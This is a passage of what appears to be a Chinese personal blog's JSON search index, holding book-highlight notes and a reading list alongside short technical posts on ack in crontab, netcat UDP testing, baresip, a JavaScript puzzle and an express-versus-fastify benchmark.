1294选择自己所爱的人就像选择心理治疗师,”鲁思说,“我们有必要问自己,这个人会不会对我忠诚,能不能听得进批评,标注(黄色) - 9 \u0026gt; 位置 1295承认所犯的错误,而且做不到的事情决不承诺?”第三部分 PAPT THREE标注(黄色) - 位置 2577虽然我生来不是个好人,有时我却偶然要做个好人。——威廉·莎士比亚《冬天的故事》[\n","permalink":"https://wdd.js.org/posts/2021/07/rgx3g5/","summary":"沉默的病人(世界狂销300万册的烧脑神作!多少看似完美的夫妻,都在等待杀死对方的契机)亚历克斯·麦克利兹\n第二部分 PAPT TWO标注(黄色) - 9 \u0026gt; 位置 1294选择自己所爱的人就像选择心理治疗师,”鲁思说,“我们有必要问自己,这个人会不会对我忠诚,能不能听得进批评,标注(黄色) - 9 \u0026gt; 位置 1295承认所犯的错误,而且做不到的事情决不承诺?”第三部分 PAPT THREE标注(黄色) - 位置 2577虽然我生来不是个好人,有时我却偶然要做个好人。——威廉·莎士比亚《冬天的故事》[","title":"沉默的病人(世界狂销300万册的烧脑神作!多少看似完美的夫妻,都在等待杀死对方的契机)"},{"content":"手工执行,可以获得预期结果,但是在crontab中,却查不到结果。\nstage_count=$(ack -h \u0026#34;\\- name:\u0026#34; -t yaml | wc -l) 最终使用--nofilter参数,解决了问题。\nstage_count=$(ack --nofilter -h \u0026#34;\\- name:\u0026#34; -t yaml | wc -l) 参考\nhttps://stackoverflow.com/questions/55777520/ack-fails-in-cronjob-but-runs-fine-from-commandline ","permalink":"https://wdd.js.org/shell/contab-ack/","summary":"手工执行,可以获得预期结果,但是在crontab中,却查不到结果。\nstage_count=$(ack -h \u0026#34;\\- name:\u0026#34; -t yaml | wc -l) 最终使用--nofilter参数,解决了问题。\nstage_count=$(ack --nofilter -h \u0026#34;\\- name:\u0026#34; -t yaml | wc -l) 参考\nhttps://stackoverflow.com/questions/55777520/ack-fails-in-cronjob-but-runs-fine-from-commandline ","title":"Ack 在contab中无法查到关键词"},{"content":"引言标注(黄色) - 位置 225人并不是住在客观的世界,而是住在自己营造的主观世界里。第一夜 我们的不幸是谁的错?标注(黄色) - 不为人知的心理学“第三巨头” \u0026gt; 位置 335但在世界上,阿德勒是与弗洛伊德、荣格并列的三大巨头之一。标注(黄色) - 再怎么“找原因”,也没法改变一个人 \u0026gt; 位置 377如果所有人的“现在”都由“过去”所决定,那岂不是很奇怪吗?标注(黄色) - 再怎么“找原因”,也没法改变一个人 \u0026gt; 位置 384您是说与过去没有关系?哲人:是的,这就是阿德勒心理学的立场。标注(黄色) - 再怎么“找原因”,也没法改变一个人 \u0026gt; 位置 389阿德勒心理学考虑的不是过去的“原因”,而是现在的“目的”。标注(黄色) - 心理创伤并不存在 \u0026gt; 位置 417任何经历本身并不是成功或者失败的原因。我们并非因为自身经历中的刺激——所谓的心理创伤——而痛苦,事实上我们会从经历中发现符合自己目的的因素。决定我们自身的不是过去的经历,而是我们自己赋予经历的意义。”标注(黄色) - 心理创伤并不存在 \u0026gt; 位置 423人生不是由别人赋予的,而是由自己选择的,是自己选择自己如何生活。标注(黄色) - 心理创伤并不存在 \u0026gt; 位置 443我们大家都是在为了某种“目的”而活着。这就是目的论。标注(黄色) - 你的不幸,皆是自己“选择”的 \u0026gt; 位置 599而是因为你认为“不幸”对你自身而言是一种“善”。标注(黄色) - 人们常常下定决心“不改变” \u0026gt; 位置 614某人如何看“世界”,又如何看“自己”,把这些“赋予意义的方式”汇集起来的概念就可以理解为生活方式。标注(黄色) - 你的人生取决于“当下” \u0026gt; 位置 706无论之前的人生发生过什么,都对今后的人生如何度过没有影响。”决定自己人生的是活在“此时此刻”的你自己。第二夜 一切烦恼都来自人际关系标注(黄色) - 为什么讨厌自己? \u0026gt; 位置 780阿德勒心理学把这叫作“鼓励”。青年:鼓励?书签 - 一切烦恼都是人际关系的烦恼 \u0026gt; 位置 834标注(黄色) - 自卑情结只是一种借口 \u0026gt; 位置 936自卑情结是指把自己的自卑感当作某种借口使用的状态。标注(黄色) - 自卑情结只是一种借口 \u0026gt; 位置 943外部因果律”一词来进行说明。意思就是:将原本没有任何因果关系的事情解释成似乎有重大因果关系一样。标注(黄色) - 人生不是与他人的比赛 \u0026gt; 位置 1044健全的自卑感不是来自与别人的比较,而是来自与“理想的自己”的比较。标注(黄色) - 在意你长相的,只有你自己 \u0026gt; 位置 1071在意你长相的,只有你自己标注(黄色) - 人生的三大课题:交友课题、工作课题以及爱的课题 \u0026gt; 位置 1223交友课题、工作课题以及爱的课题标注(黄色) - 人生的三大课题:交友课题、工作课题以及爱的课题 \u0026gt; 位置 1224一切烦恼皆源于人际关系”标注(黄色) - 浪漫的红线和坚固的锁链 \u0026gt; 位置 1313当人能够感觉到“与这个人在一起可以无拘无束”的时候,才能够体会到爱。既没有自卑感也不必炫耀优越性,能够保持一种平静而自然的状态。真正的爱应该是这样的。标注(黄色) - 浪漫的红线和坚固的锁链 \u0026gt; 位置 1315束缚是想要支配对方的表现,也是一种基于不信任感的想法。与一个不信任自己的人处在同一个空间里,那就根本不可能保持一种自然状态。标注(黄色) - “人生谎言”教我们学会逃避 \u0026gt; 位置 1333那并不是因为无法容忍 A的缺点才讨厌他,而是你先有“要讨厌 A”这个目的,之后才找出了符合这个目的的缺点。标注(黄色) - “人生谎言”教我们学会逃避 \u0026gt; 位置 1345人就是这么任性而自私的生物,一旦产生这种想法,无论怎样都能发现对方的缺点。标注(黄色) - 阿德勒心理学是“勇气的心理学” \u0026gt; 位置 1373青年:也就是“不在于被给予了什么,而在于如何去使用被给予的东西”那句话吗?第三夜 让干涉你生活的人见鬼去标注(黄色) - 自由就是不再寻求认可? \u0026gt; 位置 1405就是:“货币是被铸造的自由。”它是陀思妥耶夫斯基的小说中出现的一句话。“被铸造的自由”这种说法是何等的痛快啊!我认为这是一句非常精辟的话,它一语道破了货币的标注(黄色) - 自由就是不再寻求认可? \u0026gt; 位置 1449阿德勒心理学否定寻求他人的认可。标注(黄色) - 要不要活在别人的期待中? \u0026gt; 位置 1479在犹太教教义中有这么一句话:“倘若自己都不为自己活出自己的人生,那还有谁会为自己而活呢?”你就活在自己的人生中。书签 - 要不要活在别人的期待中? \u0026gt; 位置 1498标注(黄色) - 砍断“格尔迪奥斯绳结” \u0026gt; 位置 1689否定原因论、否定精神创伤、采取目的论;认为人的烦恼全都是关于人际关系的烦恼;此外,不寻求认可或者课题分离也全都是反常识的理论。标注(黄色) - 自由就是被别人讨厌 \u0026gt; 位置 1764自由就是被别人讨厌”。标注(黄色) - 自由就是被别人讨厌 \u0026gt; 位置 1785不畏惧被人讨厌而是勇往直前,不随波逐流而是激流勇进,这才是对人而言的自由。第五夜 认真的人生“活在当下”标注(黄色) - 对决“人生最大的谎言” \u0026gt; 位置 2910人生中最大的谎言就是不活在“此时此刻”。纠结过去、关注未来,把微弱而模糊的光打向人生整体,自认为看到了些什么。标注(黄色) - 对决“人生最大的谎言” \u0026gt; 位置 2916因为过去和未来根本不存在,所以才要谈现在。起决定作用的既不是昨天也不是明天,而是“此时此刻”。标注(黄色) - 人生的意义,由你自己决定 \u0026gt; 位置 2982必须有人开始。即使别人不合作,那也与你无关。我的意见就是这样。应该由你开始,不用去考虑别人是否合作。”后记标注(黄色) - 位置 3011一切烦恼皆源于人际关系”“人可以随时改变并能够获得幸福”“问题不在于能力而在于勇气\n","permalink":"https://wdd.js.org/posts/2021/06/ineayu/","summary":"引言标注(黄色) - 位置 225人并不是住在客观的世界,而是住在自己营造的主观世界里。第一夜 我们的不幸是谁的错?标注(黄色) - 不为人知的心理学“第三巨头” \u0026gt; 位置 335但在世界上,阿德勒是与弗洛伊德、荣格并列的三大巨头之一。标注(黄色) - 再怎么“找原因”,也没法改变一个人 \u0026gt; 位置 377如果所有人的“现在”都由“过去”所决定,那岂不是很奇怪吗?标注(黄色) - 再怎么“找原因”,也没法改变一个人 \u0026gt; 位置 384您是说与过去没有关系?哲人:是的,这就是阿德勒心理学的立场。标注(黄色) - 再怎么“找原因”,也没法改变一个人 \u0026gt; 位置 389阿德勒心理学考虑的不是过去的“原因”,而是现在的“目的”。标注(黄色) - 心理创伤并不存在 \u0026gt; 位置 417任何经历本身并不是成功或者失败的原因。我们并非因为自身经历中的刺激——所谓的心理创伤——而痛苦,事实上我们会从经历中发现符合自己目的的因素。决定我们自身的不是过去的经历,而是我们自己赋予经历的意义。”标注(黄色) - 心理创伤并不存在 \u0026gt; 位置 423人生不是由别人赋予的,而是由自己选择的,是自己选择自己如何生活。标注(黄色) - 心理创伤并不存在 \u0026gt; 位置 443我们大家都是在为了某种“目的”而活着。这就是目的论。标注(黄色) - 你的不幸,皆是自己“选择”的 \u0026gt; 位置 599而是因为你认为“不幸”对你自身而言是一种“善”。标注(黄色) - 人们常常下定决心“不改变” \u0026gt; 位置 614某人如何看“世界”,又如何看“自己”,把这些“赋予意义的方式”汇集起来的概念就可以理解为生活方式。标注(黄色) - 你的人生取决于“当下” \u0026gt; 位置 706无论之前的人生发生过什么,都对今后的人生如何度过没有影响。”决定自己人生的是活在“此时此刻”的你自己。第二夜 一切烦恼都来自人际关系标注(黄色) - 为什么讨厌自己? \u0026gt; 位置 780阿德勒心理学把这叫作“鼓励”。青年:鼓励?书签 - 一切烦恼都是人际关系的烦恼 \u0026gt; 位置 834标注(黄色) - 自卑情结只是一种借口 \u0026gt; 位置 936自卑情结是指把自己的自卑感当作某种借口使用的状态。标注(黄色) - 自卑情结只是一种借口 \u0026gt; 位置 943外部因果律”一词来进行说明。意思就是:将原本没有任何因果关系的事情解释成似乎有重大因果关系一样。标注(黄色) - 人生不是与他人的比赛 \u0026gt; 位置 1044健全的自卑感不是来自与别人的比较,而是来自与“理想的自己”的比较。标注(黄色) - 在意你长相的,只有你自己 \u0026gt; 位置 1071在意你长相的,只有你自己标注(黄色) - 人生的三大课题:交友课题、工作课题以及爱的课题 \u0026gt; 位置 1223交友课题、工作课题以及爱的课题标注(黄色) - 人生的三大课题:交友课题、工作课题以及爱的课题 \u0026gt; 位置 1224一切烦恼皆源于人际关系”标注(黄色) - 浪漫的红线和坚固的锁链 \u0026gt; 位置 1313当人能够感觉到“与这个人在一起可以无拘无束”的时候,才能够体会到爱。既没有自卑感也不必炫耀优越性,能够保持一种平静而自然的状态。真正的爱应该是这样的。标注(黄色) - 浪漫的红线和坚固的锁链 \u0026gt; 位置 1315束缚是想要支配对方的表现,也是一种基于不信任感的想法。与一个不信任自己的人处在同一个空间里,那就根本不可能保持一种自然状态。标注(黄色) - “人生谎言”教我们学会逃避 \u0026gt; 位置 1333那并不是因为无法容忍 A的缺点才讨厌他,而是你先有“要讨厌 A”这个目的,之后才找出了符合这个目的的缺点。标注(黄色) - “人生谎言”教我们学会逃避 \u0026gt; 位置 1345人就是这么任性而自私的生物,一旦产生这种想法,无论怎样都能发现对方的缺点。标注(黄色) - 阿德勒心理学是“勇气的心理学” \u0026gt; 位置 1373青年:也就是“不在于被给予了什么,而在于如何去使用被给予的东西”那句话吗?第三夜 让干涉你生活的人见鬼去标注(黄色) - 自由就是不再寻求认可? \u0026gt; 位置 1405就是:“货币是被铸造的自由。”它是陀思妥耶夫斯基的小说中出现的一句话。“被铸造的自由”这种说法是何等的痛快啊!我认为这是一句非常精辟的话,它一语道破了货币的标注(黄色) - 自由就是不再寻求认可? \u0026gt; 位置 1449阿德勒心理学否定寻求他人的认可。标注(黄色) - 要不要活在别人的期待中? \u0026gt; 位置 1479在犹太教教义中有这么一句话:“倘若自己都不为自己活出自己的人生,那还有谁会为自己而活呢?”你就活在自己的人生中。书签 - 要不要活在别人的期待中? \u0026gt; 位置 1498标注(黄色) - 砍断“格尔迪奥斯绳结” \u0026gt; 位置 1689否定原因论、否定精神创伤、采取目的论;认为人的烦恼全都是关于人际关系的烦恼;此外,不寻求认可或者课题分离也全都是反常识的理论。标注(黄色) - 自由就是被别人讨厌 \u0026gt; 位置 1764自由就是被别人讨厌”。标注(黄色) - 自由就是被别人讨厌 \u0026gt; 位置 1785不畏惧被人讨厌而是勇往直前,不随波逐流而是激流勇进,这才是对人而言的自由。第五夜 认真的人生“活在当下”标注(黄色) - 对决“人生最大的谎言” \u0026gt; 位置 2910人生中最大的谎言就是不活在“此时此刻”。纠结过去、关注未来,把微弱而模糊的光打向人生整体,自认为看到了些什么。标注(黄色) - 对决“人生最大的谎言” \u0026gt; 位置 2916因为过去和未来根本不存在,所以才要谈现在。起决定作用的既不是昨天也不是明天,而是“此时此刻”。标注(黄色) - 人生的意义,由你自己决定 \u0026gt; 位置 2982必须有人开始。即使别人不合作,那也与你无关。我的意见就是这样。应该由你开始,不用去考虑别人是否合作。”后记标注(黄色) - 位置 3011一切烦恼皆源于人际关系”“人可以随时改变并能够获得幸福”“问题不在于能力而在于勇气","title":"被讨厌的勇气:“自我启发之父”阿德勒的哲学课"},{"content":"有时候,客户端的udp包被中间的防火墙拦截了,在linux上可以很简单的用nc启动一个udp server\n# 启动udp server 监听8888端口 nc -ulp 20000 # 启动udp client nc -u 127.0.0.1 20000 在linux上启动nc udp server很简单,但是在windows上,没办法安装nc啊?😭\n峰回路转 https://nmap.org/download.html 在查看了nc的官网之后,发现nc实际上也提供了windows的程序,有两种版本。\n有GUI界面的,使用友好,安装包比较大 https://nmap.org/dist/nmap-7.91-setup.exe 仅仅在命令行下执行,刚好满足需求 https://nmap.org/dist/nmap-7.91-win32.zip 看看带GUI界面的\n附件 nmap-7.91-win32.zip ","permalink":"https://wdd.js.org/posts/2021/06/ex5n9h/","summary":"有时候,客户端的udp包被中间的防火墙拦截了,在linux上可以很简单的用nc启动一个udp server\n# 启动udp server 监听8888端口 nc -ulp 20000 # 启动udp client nc -u 127.0.0.1 20000 在linux上启动nc udp server很简单,但是在windows上,没办法安装nc啊?😭\n峰回路转 https://nmap.org/download.html 在查看了nc的官网之后,发现nc实际上也提供了windows的程序,有两种版本。\n有GUI界面的,使用友好,安装包比较大 https://nmap.org/dist/nmap-7.91-setup.exe 仅仅在命令行下执行,刚好满足需求 https://nmap.org/dist/nmap-7.91-win32.zip 看看带GUI界面的\n附件 nmap-7.91-win32.zip ","title":"windows版本nc教程:在windows上做udp测试"},{"content":"现象 有时候轻微滚动滚轮,页面不滚动,然后突然又发生了滚动 解决方案 Mos https://github.com/Caldis/Mos 一个用于在MacOS上平滑你的鼠标滚动效果的小工具, 让你的滚轮爽如触控板。 特性 疯狂平滑你的鼠标滚动效果 支持分离触控板/鼠标事件, 单独翻转鼠标滚动方向。 滚动曲线的自定义调整。 支持区分应用处理, 黑/白名单系统。 用于监控滚动事件的图形化呈现窗口。 基于 Swift4 构建 免费 附件 Mos.Versions.3.3.2.dmg ","permalink":"https://wdd.js.org/posts/2021/06/ismran/","summary":"现象 有时候轻微滚动滚轮,页面不滚动,然后突然又发生了滚动 解决方案 Mos https://github.com/Caldis/Mos 一个用于在MacOS上平滑你的鼠标滚动效果的小工具, 让你的滚轮爽如触控板。 特性 疯狂平滑你的鼠标滚动效果 支持分离触控板/鼠标事件, 单独翻转鼠标滚动方向。 滚动曲线的自定义调整。 支持区分应用处理, 黑/白名单系统。 用于监控滚动事件的图形化呈现窗口。 基于 Swift4 构建 免费 附件 Mos.Versions.3.3.2.dmg ","title":"macos 鼠标滚轮不灵敏"},{"content":"安装 安装前要先安装依赖\nhttps://github.com/baresip/re https://github.com/baresip/rem openssl git clone https://github.com/baresip/baresip cd baresip make sudo make install 指令 /about About box/accept Accept incoming call/answermode Set answer mode/apistate User Agent state/auloop Start audio-loop /auloop_stop Stop audio-loop/auplay Switch audio player/ausrc Switch audio source/callstat Call status/conf_reload Reload config file/config Print configuration/contact_next Set next contact/contact_prev Set previous contact/contacts List contacts/dial .. Dial/dialcontact Dial current contact/hangup Hangup call/help Help menu/insmod Load module/listcalls List active calls/loglevel Log level toggle/main Main loop debug/memstat Memory status/message Message current contact/modules Module debug/netstat Network debug/options Options/play Play audio file/quit Quit/reginfo Registration info/rmmod Unload module/sipstat SIP debug/sysinfo System info/timers Timer debug/uadel Delete User-Agent/uafind Find User-Agent /uanew Create User-Agent/uanext Toggle UAs/uastat UA debug/uuid Print UUID/vidloop Start video-loop /vidloop stop Stop video-loop/vidsrc Switch video source\n模块 aac Advanced Audio Coding (AAC) audio codecaccount Account loaderalsa ALSA audio driveramr Adaptive Multi-Rate (AMR) audio codecaptx Audio Processing Technology codec (aptX)aubridge Audio bridge moduleaudiounit AudioUnit audio driver for MacOSX/iOSaufile Audio module for using a WAV-file as audio inputauloop Audio-loop test moduleausine Audio sine wave input moduleav1 AV1 video codecavcapture Video source using iOS AVFoundation video captureavcodec Video codec using FFmpeg/libav libavcodecavformat Video source using FFmpeg/libav libavformatb2bua Back-to-Back User-Agent (B2BUA) modulecodec2 Codec2 low bit rate speech codeccons UDP/TCP console UI drivercontact Contacts modulecoreaudio Apple macOS Coreaudio driverctrl_tcp TCP control interface using JSON payloaddebug_cmd Debug commandsdirectfb DirectFB video display moduledshow Windows DirectShow video sourcedtls_srtp DTLS-SRTP end-to-end encryptionebuacip EBU ACIP (Audio Contribution over IP) Profileecho Echo server moduleevdev Linux input driverfakevideo Fake video input/output driverg711 G.711 audio codecg722 G.722 audio codecg7221 G.722.1 audio codecg726 G.726 audio codecgsm GSM audio codecgst Gstreamer audio sourcegst_video Gstreamer video codecgtk GTK+ 2.0 UIgzrtp ZRTP module using GNU ZRTP C++ libraryhttpd HTTP webserver UI-modulei2s I2S (Inter-IC Sound) audio driverice ICE protocol for NAT Traversaljack JACK Audio Connection Kit audio-driverl16 L16 audio codecmenu Interactive menumpa MPA Speech and Audio Codecmulticast Multicast RTP send and receivemqtt MQTT (Message Queue Telemetry Transport) modulemwi Message Waiting Indicationnatpmp NAT Port Mapping Protocol (NAT-PMP) moduleomx OpenMAX IL video display moduleopensles OpenSLES audio driveropus OPUS Interactive audio codecpcp Port Control Protocol (PCP) moduleplc Packet Loss Concealment (PLC) using spandspportaudio Portaudio driverpulse Pulseaudio driverpresence Presence modulertcpsummary RTCP summary modulerst Radio streamer using mpg123sdl Simple DirectMedia Layer 2.0 (SDL) video output driverselfview Video selfview modulesnapshot Save video-stream as PNG imagessndfile Audio dumper using libsndfilesndio Audio driver for OpenBSDspeex_pp Audio pre-processor using libspeexdspsrtp Secure RTP encryption (SDES) using libre SRTP-stackstdio Standard input/output UI driverstun Session Traversal Utilities for NAT (STUN) moduleswscale Video scaling using libswscalesyslog Syslog moduleturn Obtaining Relay Addresses from STUN (TURN) moduleuuid UUID generator and loaderv4l2 Video4Linux2 video sourcev4l2_codec Video4Linux2 video codec module (H264 hardware encoding)vidbridge Video bridge modulevidinfo Video info overlay modulevidloop Video-loop test modulevp8 VP8 video codecvp9 VP9 video codecvumeter Display audio levels in consolewebrtc_aec Acoustic Echo Cancellation (AEC) using WebRTC SDKwincons Console input driver for Windowswinwave Audio driver for Windowsx11 X11 video output driverx11grab X11 grabber video sourcezrtp ZRTP media encryption module\n参考 https://github.com/baresip/baresip ","permalink":"https://wdd.js.org/opensips/tools/baresip/","summary":"安装 安装前要先安装依赖\nhttps://github.com/baresip/re https://github.com/baresip/rem openssl git clone https://github.com/baresip/baresip cd baresip make sudo make install 指令 /about About box/accept Accept incoming call/answermode Set answer mode/apistate User Agent state/auloop Start audio-loop /auloop_stop Stop audio-loop/auplay Switch audio player/ausrc Switch audio source/callstat Call status/conf_reload Reload config file/config Print configuration/contact_next Set next contact/contact_prev Set previous contact/contacts List contacts/dial .. Dial/dialcontact Dial current contact/hangup Hangup call/help Help menu/insmod Load module/listcalls List active calls/loglevel Log level toggle/main Main loop debug/memstat Memory status/message Message current contact/modules Module debug/netstat Network debug/options Options/play Play audio file/quit Quit/reginfo Registration info/rmmod Unload module/sipstat SIP debug/sysinfo System info/timers Timer debug/uadel Delete User-Agent/uafind Find User-Agent /uanew Create User-Agent/uanext Toggle UAs/uastat UA debug/uuid Print UUID/vidloop Start video-loop /vidloop stop Stop video-loop/vidsrc Switch video source","title":"baresip 非常好用的终端SIP UA"},{"content":"第一讲 关关雎鸠在河洲 ——先秦神话和诗歌标注(黄色) - 位置 129女娲炼石补天处,石破天惊逗秋雨”,第二讲 百家争鸣写春秋 ——先秦散文标注(黄色) - 位置 306为川者决之使导,为民者宣之使言。”标注(黄色) - 位置 466他就发愤努力,一定要做仓库里的老鼠。第三讲 大风起兮云飞扬 ——汉朝的赋和散文标注(黄色) - 位置 538有两个情况可以免死:一是拿出大量的金钱赎身;第二就是受宫刑。标注(黄色) - 位置 539叫《报任安书》:标注(黄色) - 位置 557事情。《史记》写完之后,司马迁就不知所终了。第六讲 独念天地之悠悠 ——隋与初唐文学标注(黄色) - 位置 1346王勃,他在初唐时代是一个非常有才华的少年,他 27岁就死了。真是“千古文章未尽才”。他写《滕王阁序》,标注(黄色) - 位置 1359就是把你的遭遇拉到跟他相同的地步。譬如说,你考试得了 65分,不高兴,我就对你说:不要难过嘛,我不过只考 67分而已,咱们俩都差不多。第七讲 登高壮观天地间 ——盛唐诗歌标注(黄色) - 位置 1406秦时明月汉时关,万里长征人未还。但使龙城飞将在,不教胡马度阴山。——王昌龄《出塞二首》(其一)标注(黄色) - 位置 1664桃花潭水深千尺,不及汪伦送我情。第八讲 乌衣巷口夕阳斜 ——中唐诗歌标注(黄色) - 位置 1809座中泣下谁最多,江州司马青衫湿。”标注(黄色) - 位置 1892十年磨一剑,霜刃未曾试。第九讲 霜叶红于二月花 ——晚唐诗歌标注(黄色) - 位置 1906停车坐爱枫林晚,霜叶红于二月花。第十讲 大江东去浪淘沙 ——两宋金元文学书签 - 位置 2168标注(黄色) - 位置 2509山盟虽在,锦书难托。标注(黄色) - 位置 2559劝君更尽一杯酒,西出阳关无故人”,标注(黄色) - 位置 2560桃花潭水深千尺,不及汪伦送我情”,\n","permalink":"https://wdd.js.org/posts/2021/06/rml5uy/","summary":"第一讲 关关雎鸠在河洲 ——先秦神话和诗歌标注(黄色) - 位置 129女娲炼石补天处,石破天惊逗秋雨”,第二讲 百家争鸣写春秋 ——先秦散文标注(黄色) - 位置 306为川者决之使导,为民者宣之使言。”标注(黄色) - 位置 466他就发愤努力,一定要做仓库里的老鼠。第三讲 大风起兮云飞扬 ——汉朝的赋和散文标注(黄色) - 位置 538有两个情况可以免死:一是拿出大量的金钱赎身;第二就是受宫刑。标注(黄色) - 位置 539叫《报任安书》:标注(黄色) - 位置 557事情。《史记》写完之后,司马迁就不知所终了。第六讲 独念天地之悠悠 ——隋与初唐文学标注(黄色) - 位置 1346王勃,他在初唐时代是一个非常有才华的少年,他 27岁就死了。真是“千古文章未尽才”。他写《滕王阁序》,标注(黄色) - 位置 1359就是把你的遭遇拉到跟他相同的地步。譬如说,你考试得了 65分,不高兴,我就对你说:不要难过嘛,我不过只考 67分而已,咱们俩都差不多。第七讲 登高壮观天地间 ——盛唐诗歌标注(黄色) - 位置 1406秦时明月汉时关,万里长征人未还。但使龙城飞将在,不教胡马度阴山。——王昌龄《出塞二首》(其一)标注(黄色) - 位置 1664桃花潭水深千尺,不及汪伦送我情。第八讲 乌衣巷口夕阳斜 ——中唐诗歌标注(黄色) - 位置 1809座中泣下谁最多,江州司马青衫湿。”标注(黄色) - 位置 1892十年磨一剑,霜刃未曾试。第九讲 霜叶红于二月花 ——晚唐诗歌标注(黄色) - 位置 1906停车坐爱枫林晚,霜叶红于二月花。第十讲 大江东去浪淘沙 ——两宋金元文学书签 - 位置 2168标注(黄色) - 位置 2509山盟虽在,锦书难托。标注(黄色) - 位置 2559劝君更尽一杯酒,西出阳关无故人”,标注(黄色) - 位置 2560桃花潭水深千尺,不及汪伦送我情”,","title":"一日看尽长安花——听北大教授畅讲中国古代文学"},{"content":"5月书单回顾 《鲁滨逊漂流》记 读完 人在孤独的时候,适合读这本书 《被讨厌的勇气》读到 69%, 很有幸读到这本书,6月继续 《围城》读到21%,我好喜欢钱老的比喻句,总是那么别具一格,让人耳目一新 《一日看尽长安花》读到81%, 我喜欢唐诗宋词,就像是喜欢牛奶一样,非常有营养,又让人回味无穷 《牛津通识读本 数学》读完,如果我能早点读到这本书,我就很可能喜欢上数学。 6月书单 《鳗鱼的旅行》刚读到20% 《Googler软件测试之道》刚读到53%, 牛逼的公司,牛逼的测试 《软件测试之道微软技术专家经验总结》10% 《沉默的病人》1% 《一个人的朝圣》0% 《读懂发票》12% 《108个训练让你成为手机摄影达人》 《经济学通识课》 《楚留香传奇》21% ","permalink":"https://wdd.js.org/posts/2021/06/qpdnp4/","summary":"5月书单回顾 《鲁滨逊漂流》记 读完 人在孤独的时候,适合读这本书 《被讨厌的勇气》读到 69%, 很有幸读到这本书,6月继续 《围城》读到21%,我好喜欢钱老的比喻句,总是那么别具一格,让人耳目一新 《一日看尽长安花》读到81%, 我喜欢唐诗宋词,就像是喜欢牛奶一样,非常有营养,又让人回味无穷 《牛津通识读本 数学》读完,如果我能早点读到这本书,我就很可能喜欢上数学。 6月书单 《鳗鱼的旅行》刚读到20% 《Googler软件测试之道》刚读到53%, 牛逼的公司,牛逼的测试 《软件测试之道微软技术专家经验总结》10% 《沉默的病人》1% 《一个人的朝圣》0% 《读懂发票》12% 《108个训练让你成为手机摄影达人》 《经济学通识课》 《楚留香传奇》21% ","title":"6月书单"},{"content":"const a = {} function test1 (a) { a = { name: \u0026#39;wdd\u0026#39; } } function test2 () { test1(a) } function test3 () { console.log(a) } test2() test3() ","permalink":"https://wdd.js.org/fe/js-101-question/","summary":"const a = {} function test1 (a) { a = { name: \u0026#39;wdd\u0026#39; } } function test2 () { test1(a) } function test3 () { console.log(a) } test2() test3() ","title":"Js 101 Question"},{"content":"在manjaro上我用的wine版本的微信,然而保存文件时,文件无法保存到manjaro中,而只能保存到wine里面的windows中。\n用wine还是很麻烦的,于是我就选择了网页版本的微信。\n前提 chrome浏览器 操作步骤: 将微信网页版保存为书签\n打开谷歌浏览器的 chrome://apps/ 这个页面\n然后将微信网页版本的的书签拖动到这个页面, 拖动结束后,如下图所示\n在微信的图标上右键,勾选在窗口打开\n然后点击创建快捷方式\n点击创建快捷方式后,会弹出弹窗,显示chrome会在桌面和应用菜单中创建快捷方式,选择创建\n然后你就可以在桌面上看到微信的图标,点击之后chrome会单独创建一个窗口,作为微信的主界面\n使用微信网页版本的好处是\n很方便的访问Linux上的文件 微信通知也正常了 ","permalink":"https://wdd.js.org/posts/2021/06/sxwh8v/","summary":"在manjaro上我用的wine版本的微信,然而保存文件时,文件无法保存到manjaro中,而只能保存到wine里面的windows中。\n用wine还是很麻烦的,于是我就选择了网页版本的微信。\n前提 chrome浏览器 操作步骤: 将微信网页版保存为书签\n打开谷歌浏览器的 chrome://apps/ 这个页面\n然后将微信网页版本的的书签拖动到这个页面, 拖动结束后,如下图所示\n在微信的图标上右键,勾选在窗口打开\n然后点击创建快捷方式\n点击创建快捷方式后,会弹出弹窗,显示chrome会在桌面和应用菜单中创建快捷方式,选择创建\n然后你就可以在桌面上看到微信的图标,点击之后chrome会单独创建一个窗口,作为微信的主界面\n使用微信网页版本的好处是\n很方便的访问Linux上的文件 微信通知也正常了 ","title":"1分钟将微信网页版转为桌面应用"},{"content":"机器信息:4C32G 测试工具:wrk Node: v14.17.0\nexpress.js\n\u0026#39;use strict\u0026#39; const express = require(\u0026#39;express\u0026#39;) const app = express() app.get(\u0026#39;/\u0026#39;, function (req, res) { res.json({ hello: \u0026#39;world\u0026#39; }) }) app.listen(3000) fastify.js\n\u0026#39;use strict\u0026#39; const fastify = require(\u0026#39;fastify\u0026#39;)() fastify.get(\u0026#39;/\u0026#39;, function (req, reply) { reply.send({ hello: \u0026#39;world\u0026#39; }) }) fastify.listen(3000) ~ 测试结果 # express.js Running 10s test @ http://127.0.0.1:3000 12 threads and 400 connections Thread Stats Avg Stdev Max +/- Stdev Latency 55.36ms 11.53ms 173.22ms 93.16% Req/Sec 602.58 113.03 830.00 84.97% 72034 requests in 10.10s, 17.31MB read Requests/sec: 7134.75 Transfer/sec: 1.71MB # fastify.js Running 10s test @ http://127.0.0.1:3000 12 threads and 400 connections Thread Stats Avg Stdev Max +/- Stdev Latency 16.26ms 5.73ms 105.76ms 96.26% Req/Sec 2.08k 490.82 14.63k 94.92% 249114 requests in 10.09s, 44.43MB read Requests/sec: 24688.94 Transfer/sec: 4.40MB fastify是express的3.4倍, 所以对性能有所追求的话,最好用fastify。\n","permalink":"https://wdd.js.org/fe/perf-test-express-fastify/","summary":"机器信息:4C32G 测试工具:wrk Node: v14.17.0\nexpress.js\n\u0026#39;use strict\u0026#39; const express = require(\u0026#39;express\u0026#39;) const app = express() app.get(\u0026#39;/\u0026#39;, function (req, res) { res.json({ hello: \u0026#39;world\u0026#39; }) }) app.listen(3000) fastify.js\n\u0026#39;use strict\u0026#39; const fastify = require(\u0026#39;fastify\u0026#39;)() fastify.get(\u0026#39;/\u0026#39;, function (req, reply) { reply.send({ hello: \u0026#39;world\u0026#39; }) }) fastify.listen(3000) ~ 测试结果 # express.js Running 10s test @ http://127.0.0.1:3000 12 threads and 400 connections Thread Stats Avg Stdev Max +/- Stdev Latency 55.36ms 11.53ms 173.22ms 93.16% Req/Sec 602.","title":"Perf Test Express Fastify"},{"content":"ab C语言 优点 安装简单 缺点 不支持指定测试时长 安装 # debian/ubuntu apt-get install apache2-utils # centos yum -y install httpd-tools wrk https://github.com/wg/wrk C语言 优点 支持lua脚本 wrk is a modern HTTP benchmarking tool capable of generating significant load when run on a single multi-core CPU. It combines a multithreaded design with scalable event notification systems such as epoll and kqueue. An optional LuaJIT script can perform HTTP request generation, response processing, and custom reporting. Details are available in SCRIPTING and several examples are located in scripts/.\n安装 git clone https://github.com/wg/wrk.git cd wrk make sudo ln -s $PWD/wrk /usr/bin/wrk 基本使用 wrk -t12 -c400 -d30s 